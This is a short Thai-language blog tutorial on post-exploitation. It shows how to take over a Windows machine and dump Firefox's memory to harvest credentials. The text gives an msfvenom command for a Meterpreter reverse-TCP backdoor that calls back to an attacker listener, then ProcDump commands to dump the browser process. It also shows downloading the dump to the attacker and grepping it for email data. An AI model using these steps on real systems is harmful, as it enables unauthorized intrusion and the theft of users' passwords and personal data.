SysInternal Suite ถือเป็นกลุ่มของเครื่องมือที่ใช้ประโยชน์ได้หลายอย่างมากสำหรับ admin แต่ก็มีความเป็นไปได้ที่จะใช้ในทางอื่นเช่นกัน
ในบทความนี้เป็นเรื่องของ Post-Exploitation (หลังจากยึดเครื่องได้แล้ว) โดยเราจะใช้ ProcDump ซึ่งเป็นเครื่องมือสำหรับการ monitor application ที่ทำให้ CPU ขึ้นสูงและสร้าง dump ของ memory ที่ crash เพื่อดูว่าปัญหาเกิดจากอะไร. แทนที่เราจะใช้ไปในการดู memory ของ Application ที่ผิดพลาด ก็กลายเป็น dump memory ของ Browser แทน ซึ่งในที่นี้คือ Mozilla Firefox โดยเริ่มจาก
1. เข้าถึงเครื่องเป้าหมายให้ได้ ไม่ว่าจะด้วยวิธีใด และต้องได้สิทธิ์ administrator ด้วย ในที่นี้ผมใช้ Metasploit ในการโจมตีจากนั้นใช้ msfvenom ในการสร้าง backdoor
|
1 |
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<ATTACKER_LISTENER> LPORT=<ATTACKER_LISTNER_PORT> -f exe -o test.exe |
2. Upload procdump.exe ไปยังเครื่องเป้าหมาย หรือ download ได้จาก Microsoft (อย่างที่บอกไปแล้วว่า Procdump อยู่ใน Sysinternal Suite ด้วย ดังนั้นหากเรา download Sysinternal Suite มาก็ได้เช่นกัน)
3. List Process ด้วย Task Manager หรือในที่นี้ผมใช้ ps command ผ่าน meterpreter>
4. Dump memory โดยใช้คำสั่ง
|
1 |
procdump.exe -ma <TARGET_ID> |
5. หลังจาก dump เรียบร้อยก็ download กลับมาฝั่ง ATTACKER|
1 |
download <FILE_NAME> |
|
1 |
strings <FILE_NAME> | grep Email |
You May also Like
LINE@Techsuii.com
